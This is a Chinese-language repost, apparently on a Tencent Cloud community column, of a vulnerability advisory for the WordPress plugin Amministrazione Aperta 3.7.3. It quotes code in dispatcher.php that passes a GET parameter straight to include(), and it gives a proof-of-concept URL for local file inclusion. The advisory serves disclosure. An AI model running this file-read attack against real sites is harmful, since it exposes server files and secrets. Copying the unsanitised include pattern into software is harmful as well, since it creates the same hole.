前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >WordPress Amministrazione Aperta 3.7.3 任意文件读取

WordPress Amministrazione Aperta 3.7.3 任意文件读取

作者头像
Khan安全团队
发布2022-04-21 11:16:11
3610
发布2022-04-21 11:16:11
举报
文章被收录于专栏:Khan安全团队

# 供应​​商主页:https://wordpress.org/plugins/amministrazione-aperta/

# 版本:3.7.3

# 测试:火狐

# 漏洞文件:dispatcher.php

# 漏洞代码:

```

代码语言:javascript
复制
if ( isset($_GET['open']) ) {
    include(ABSPATH . 'wp-content/plugins/'.$_GET['open']);
} else {
    echo '
        <div id="welcome-panel" class="welcome-panel"
style="padding-bottom: 20px;">
                <div class="welcome-panel-column-container">';

    include_once( ABSPATH . WPINC . '/feed.php' );

```

# 概念证明:

localhost/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=[LFI]

本文系转载,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文系转载前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档